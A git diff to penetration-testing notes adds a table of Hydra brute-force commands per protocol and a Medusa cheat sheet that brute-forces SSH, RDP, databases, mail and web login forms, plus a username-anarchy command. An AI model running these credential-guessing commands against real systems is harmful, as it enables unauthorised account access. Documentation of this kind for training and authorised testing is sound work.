+| ssh | Secure Shell (SSH) | Targets SSH services to brute-force credentials, commonly used for secure remote login to systems. | `hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100` |
+| http-get/post | HTTP Web Services | Used to brute-force login credentials for HTTP web login forms using either GET or POST requests. | `hydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"` |
+| smtp | Simple Mail Transfer Protocol | Attacks email servers by brute-forcing login credentials for SMTP, commonly used to send emails. | `hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com` |
+| pop3 | Post Office Protocol (POP3) | Targets email retrieval services to brute-force credentials for POP3 login. | `hydra -l user@example.com -P /path/to/password_list.txt pop3://mail.server.com` |
+| imap | Internet Message Access Protocol | Used to brute-force credentials for IMAP services, which allow users to access their email remotely. | `hydra -l user@example.com -P /path/to/password_list.txt imap://mail.server.com` |
+| mysql | MySQL Database | Attempts to brute-force login credentials for MySQL databases. | `hydra -l root -P /path/to/password_list.txt mysql://192.168.1.100` |
+| mssql | Microsoft SQL Server | Targets Microsoft SQL servers to brute-force database login credentials. | `hydra -l sa -P /path/to/password_list.txt mssql://192.168.1.100` |
+| vnc | Virtual Network Computing (VNC) | Brute-forces VNC services, used for remote desktop access. | `hydra -P /path/to/password_list.txt vnc://192.168.1.100` |
+| rdp | Remote Desktop Protocol (RDP) | Targets Microsoft RDP services for remote login brute-forcing. | `hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100` |
\ No newline at end of file
diff --git a/docs/medusa.md b/docs/medusa.md
index ed6a5cf0c..2defbd389 100644
--- a/docs/medusa.md
+++ b/docs/medusa.md
@@ -24,6 +24,15 @@ make
make install
```
+Alternative install:
+
+```bash
+sudo apt-get -y update
+sudo apt-get -y install medusa
+```
+
+
+
## Basic usage
@@ -37,5 +46,66 @@ medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h $IP -M ftp -n 2121
# -h: host /IP
# -M: protocol to bruteforce
# -n: for a different non-default port. For instance, port 2121 for ftp
+
+
+# -m Module options: Provide additional parameters required by the chosen module, enclosed in quotes.
+medusa -M http -m "POST /login.php HTTP/1.1\r\nContent-Length: 30\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=^USER^&password=^PASS^" ...
+
+# -t Tasks: Define the number of parallel login attempts to run, potentially speeding up the attack.
+medusa -t 4 ...
+
+# -f or -F: Fast mode: Stop the attack after the first successful login is found, either on the current host (-f) or any host (-F).
+medusa -f ... or medusa -F ...
+
+```
+
+
+## Medusa modules
+
+
+```bash
+# Testing for Empty or Default Passwords
+medusa -h 10.0.0.5 -U usernames.txt -e ns -M service_name
+# Perform additional checks for empty passwords (-e n) and passwords matching the username (-e s).
+# Use the appropriate service module (replace service_name with the correct module name).
+
+
+# FTP: File Transfer Protocol. Brute-forcing FTP login credentials, used for file transfers over a network.
+medusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt
+
+
+# HTTP: Hypertext Transfer Protocol. Brute-forcing login forms on web applications over HTTP (GET/POST).
+medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^
+
+# IMAP: Internet Message Access Protocol. Brute-forcing IMAP logins, often used to access email servers.
+medusa -M imap -h mail.example.com -U users.txt -P passwords.txt
+
+# MySQL: MySQL Database. Brute-forcing MySQL database credentials, commonly used for web applications and databases.
+medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt
+
+# POP3: Post Office Protocol 3. Brute-forcing POP3 logins, typically used to retrieve emails from a mail server.
+medusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt
+
+
+# RDP: Remote Desktop Protocol. Brute-forcing RDP logins, commonly used for remote desktop access to Windows systems.
+medusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt
+
+# SSHv2: Secure Shell (SSH). Brute-forcing SSH logins, commonly used for secure remote access.
+medusa -M ssh -h 192.168.1.100 -u root -P passwords.txt
+
+# Subversion (SVN): Version Control System. Brute-forcing Subversion (SVN) repositories for version control.
+medusa -M svn -h 192.168.1.100 -u admin -P passwords.txt
+
+# Telnet: Telnet Protocol. Brute-forcing Telnet services for remote command execution on older systems.
+medusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt
+
+# VNC: Virtual Network Computing. Brute-forcing VNC login credentials for remote desktop access.
+medusa -M vnc -h 192.168.1.100 -P passwords.txt
+
+# Web Form: Brute-forcing Web Login Forms. Brute-forcing login forms on websites using HTTP POST requests.
+medusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid"
+
+# Targeting Multiple Web Servers with Basic HTTP Authentication
+medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET
```
diff --git a/docs/username-anarchy.md b/docs/username-anarchy.md
index 185d719ce..c3c29477f 100644
--- a/docs/username-anarchy.md
+++ b/docs/username-anarchy.md
@@ -28,4 +28,10 @@ git clone https://github.com/urbanadventurer/username-anarchy.git
```bash
cd username-anarchy
./username-anarchy -i /home/ltnbob/realneames.txt
-```
\ No newline at end of file
+```
+
+```bash
+# List modules
+./username-anarchy -l
+```
+